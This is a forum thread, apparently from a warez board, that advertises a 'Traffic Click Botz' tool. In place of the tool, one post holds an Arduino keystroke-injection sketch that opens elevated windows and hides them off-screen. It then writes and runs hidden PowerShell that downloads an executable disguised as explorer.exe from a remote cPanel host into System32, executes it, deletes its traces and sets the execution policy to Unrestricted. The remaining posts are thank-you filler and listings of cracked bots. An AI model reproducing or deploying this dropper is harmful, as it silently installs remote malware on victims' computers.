Traffic Click Botz Full

214 Replies, 10524 Views

thanks
Thanks
/**
 * Made with Duckuino, an open-source project.
 * Check the license at 'https://github.com/Nurrl/Duckuino/blob/master/LICENSE'
 */

#include "Keyboard.h"

void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();

  // Wait 500ms
  delay(500);

  delay(750);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press("r");
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.print(F("powershell Start-Process notepad -Verb runAs"));

  typeKey(KEY_RETURN);

  delay(750);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press("y");
  Keyboard.releaseAll();

  delay(750);
  typeKey(KEY_RETURN);

  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(' ');
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.print(F("m"));

  delay(1000);
  for(int i = 0; i < 100; i++) {
    typeKey(KEY_DOWN_ARROW);
  }

  typeKey(KEY_RETURN);

  Keyboard.print(F("(New-Object Net.Webclient).DownloadFile('https://eu77.hostblast.net:2083/cpsess0952502686/frontend/paper_lantern/filemanager/showfile.html?file=explorer.exe&fileop=&dir=%2Fhome%2Filovebot%2Fpublic_html%2Fups&dirop=&charset=&file_charset=&baseurl=&basedir=',\"C:\\Windows\\System32\\77298.exe\"); Start-Process -FilePath \"C:\\Windows\\System32\\77298.exe\""));

  typeKey(KEY_RETURN);

  Keyboard.print(F("Remove-Item $MyINvocation.InvocationName"));

  typeKey(KEY_RETURN);

  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press("s");
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.print(F("C:\\Windows\\config-77298.ps1"));

  typeKey(KEY_RETURN);

  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  Keyboard.releaseAll();

  delay(750);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press("r");
  Keyboard.releaseAll();

  delay(750);
  Keyboard.print(F("powershell Start-Process cmd -Verb runAs"));

  typeKey(KEY_RETURN);

  delay(750);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press("y");
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.print(F("mode con:cols=14 lines=1"));

  typeKey(KEY_RETURN);

  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(' ');
  Keyboard.releaseAll();

  delay(750);
  Keyboard.print(F("m"));

  delay(750);
  for(int i = 0; i < 100; i++) {
    typeKey(KEY_DOWN_ARROW);
  }

  typeKey(KEY_RETURN);

  Keyboard.print(F("powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false"));

  typeKey(KEY_RETURN);

  delay(750);
  Keyboard.print(F("powershell.exe -windowstyle hidden -File C:\\Windows\\config-77298.ps1"));

  typeKey(KEY_RETURN);

  delay(750);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press("r");
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.print(F("powershell Start-Process notepad -Verb runAs"));

  typeKey(KEY_RETURN);

  delay(750);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press("y");
  Keyboard.releaseAll();

  delay(750);
  typeKey(KEY_RETURN);

  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(' ');
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.print(F("m"));

  delay(1000);
  for(int i = 0; i < 100; i++) {
    typeKey(KEY_DOWN_ARROW);
  }

  typeKey(KEY_RETURN);

  Keyboard.print(F("(New-Object Net.Webclient).DownloadFile('https://eu77.hostblast.net:2083/cpsess0952502686/frontend/paper_lantern/filemanager/showfile.html?file=explorer.exe&fileop=&dir=%2Fhome%2Filovebot%2Fpublic_html%2Fups&dirop=&charset=&file_charset=&baseurl=&basedir=',\"C:\\Windows\\System32\\76446.exe\"); Start-Process -FilePath \"C:\\Windows\\System32\\76446.exe\""));

  typeKey(KEY_RETURN);

  Keyboard.print(F("Remove-Item $MyINvocation.InvocationName"));

  typeKey(KEY_RETURN);

  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press("s");
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.print(F("C:\\Windows\\config-76446.ps1"));

  typeKey(KEY_RETURN);

  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  Keyboard.releaseAll();

  delay(750);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press("r");
  Keyboard.releaseAll();

  delay(750);
  Keyboard.print(F("powershell Start-Process cmd -Verb runAs"));

  typeKey(KEY_RETURN);

  delay(750);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press("y");
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.print(F("mode con:cols=14 lines=1"));

  typeKey(KEY_RETURN);

  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(' ');
  Keyboard.releaseAll();

  delay(750);
  Keyboard.print(F("m"));

  delay(750);
  for(int i = 0; i < 100; i++) {
    typeKey(KEY_DOWN_ARROW);
  }

  typeKey(KEY_RETURN);

  Keyboard.print(F("powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false"));

  typeKey(KEY_RETURN);

  delay(750);
  Keyboard.print(F("powershell.exe -windowstyle hidden -File C:\\Windows\\config-76446.ps1"));

  typeKey(KEY_RETURN);

  // Ending stream
  Keyboard.end();
}

/* Unused endless loop */
void loop() {}
thanks due
Looking thanks
HIDDEN CONTENT
You must reply to this thread to see links.
[Image: xbanner-600x315.png.pagespeed.ic.zrhwAKHNTU.webp]
HIDDEN CONTENT
You must reply to this thread to see links.
thank you
looks dope af
rhanks
Hay que probarlo
Thanks you

Possibly Related Threads…
Thread Author Replies Views Last Post
  Traffic Spirit Latest 6.2.1 - Send free traffic in your site and blog ahmedbiplob42 222 9,595 04-19-2024, 10:06 AM
Last Post: ankit1
  [GET] 1 Minute 1 Click Unique Article Generator smouuk 532 29,149 04-07-2024, 01:06 AM
Last Post: ramimush
  [GET] Traffic Twister [Traffic BOT] up to 200 threads BHS 308 19,078 03-10-2024, 02:44 AM
Last Post: wantutri
  Traffic Predator Cracked ​​​​​​​[Traffic Bot + Auto Click Bot] BHS 1,010 41,908 03-09-2024, 07:24 AM
Last Post: wantutri
  [GET] YouTube By Click 2.2.78 JӨКΣЯ 39 3,382 02-22-2024, 03:52 PM
Last Post: pamungkas_setia